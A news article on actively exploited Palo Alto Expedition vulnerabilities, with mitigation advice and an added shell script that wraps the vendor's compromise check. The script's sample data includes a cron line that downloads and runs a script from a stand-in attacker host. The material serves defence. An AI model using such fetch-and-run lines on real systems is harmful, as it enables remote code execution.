The Cybersecurity and Infrastructure Security Agency warned Thursday that a vulnerability in Palo Alto Networks’ firewall management software is actively being exploited in the wild, following last week’s attacks that exploited other flaws in the same software.

The two bugs in Palo Alto Networks’ Expedition tool, tracked as CVE-2024-9463 and CVE-2024-9465, could expose firewall credentials and affect Expedition versions earlier than 1.2.96, the release that fixes them, according to the vendor alert. Expedition is billed as a tool for migrating firewall configurations from other vendors’ products to Palo Alto Networks software. CISA did not provide further details on possible attackers or victims.

Palo Alto Networks’ alert notes that the company has seen exploits “against a limited number of firewall management interfaces which are exposed to the internet. We are actively investigating this activity.”

CISA’s alert comes a week after the agency warned of active exploitation of another Expedition bug, tracked as CVE-2024-5910, which affects versions earlier than 1.2.92, the release that fixes it.

CISA added CVE-2024-5910 to its Known Exploited Vulnerabilities (KEV) catalog on Nov. 7, although Palo Alto Networks first published an advisory for the bug in July. The vulnerability stems from missing authentication for a critical function in the firewall deployment and management software and allows an attacker with network access to Expedition to take over its admin account. It carries a CVSS score of 9.3.

Palo Alto Networks updated its CVE-2024-5910 advisory again Thursday. Exploitation of CVE-2024-5910 puts at risk “configuration secrets, credentials, and other data imported” into the product, Palo Alto said in the alert.

CISA’s addition of the vulnerability to the KEV catalog means that federal civilian agencies are required to remediate it by a set deadline.

The cybersecurity firm Horizon3.ai dove into the bug and found three additional vulnerabilities in the software: CVE-2024-9464, CVE-2024-9465 and CVE-2024-9466.

Palo Alto advised users to upgrade to a fixed version, to restrict network access to Expedition to authorized users, hosts and networks, and to shut Expedition down entirely when it is not in active use. Because the bugs expose stored credentials, usernames, passwords and API keys held in Expedition should also be rotated after upgrading.

Concerning CVE-2024-9465, administrators should “check for an indicator of compromise with the following command on an Expedition system (replace ‘root’ with your username if you are using a different username)”:

mysql -uroot -p -D pandb -e "SELECT * FROM cronjobs;"

Palo Alto noted that any records returned would indicate a compromise, but also warned that an empty result is not proof the system is clean: a system can still be compromised even if nothing is returned.
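A script form of that check, added here as an example and not taken from the vendor advisory or the article: it runs the same query in batch mode and keeps the three outcomes apart, rows returned (treat as compromised), no rows (inconclusive, per the vendor’s caveat) and a failed query (no verdict at all). The database and table names come from the command above; the sample rows embedded in the script are constructed for illustration and their column layout is assumed, and the only mysql client flags used beyond the vendor’s are the standard --batch and --skip-column-names.

```shell
#!/bin/sh
# Added example, not code from the Palo Alto Networks advisory or from CyberScoop.
# Wraps the vendor's IoC query so a script can tell three outcomes apart:
# rows returned (treat as compromised), no rows (inconclusive, per the vendor's
# caveat) and query failure (no verdict). Assumptions: the mysql client is on
# the Expedition host, and "pandb" / "cronjobs" are the database and table the
# advisory names; the column layout of the sample rows below is invented.

# Constructed sample of what `mysql --batch --skip-column-names` might print
# for two injected cron jobs (tab-separated fields, one row per line).
SAMPLE_CRONJOBS_OUTPUT=$(printf '7\t*/5 * * * *\t/bin/sh -c "curl -s http://attacker.invalid/x | sh"\n8\t@reboot\t/usr/bin/python3 /tmp/.s.py')

# classify_cronjobs_output: read query output on stdin, count non-blank lines
# (each is one row of the cronjobs table) and print a single verdict token.
classify_cronjobs_output() {
    rows=0
    # `|| [ -n "$line" ]` keeps a final line that lacks a trailing newline.
    while IFS= read -r line || [ -n "$line" ]; do
        [ -z "$line" ] && continue
        rows=$((rows + 1))
        printf 'suspect cronjob row: %s\n' "$line" >&2
    done
    if [ "$rows" -gt 0 ]; then
        echo "COMPROMISED rows=$rows"
    else
        # The vendor's caveat: an empty table is not proof the host is clean.
        echo "NO_RECORDS"
    fi
}

# check_expedition_cronjobs: run the vendor's query (batch mode, no header, so
# an empty table prints nothing) and map the result to an exit status:
#   2 = rows present, 0 = no rows (inconclusive), 1 = query failed.
# Optional first argument is the MySQL user (default root, as in the advisory).
check_expedition_cronjobs() {
    db_user="${1:-root}"
    out=$(mysql --batch --skip-column-names -u"$db_user" -p -D pandb \
          -e "SELECT * FROM cronjobs;") || {
        echo "QUERY_FAILED: could not query pandb.cronjobs" >&2
        return 1
    }
    verdict=$(printf '%s\n' "$out" | classify_cronjobs_output)
    echo "$verdict"
    case "$verdict" in
        COMPROMISED*) return 2 ;;
        *) return 0 ;;
    esac
}

# Usage on an Expedition host:  check_expedition_cronjobs root; echo "exit=$?"
```

Treat exit status 2 as a confirmed hit and 0 as "no evidence from this table", not as a clean bill of health; exit status 1 means the query itself failed (wrong credentials, database name or host) and the check must be rerun rather than recorded as negative.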

The post More bugs in Palo Alto Expedition see active exploitation, CISA warns appeared first on CyberScoop.
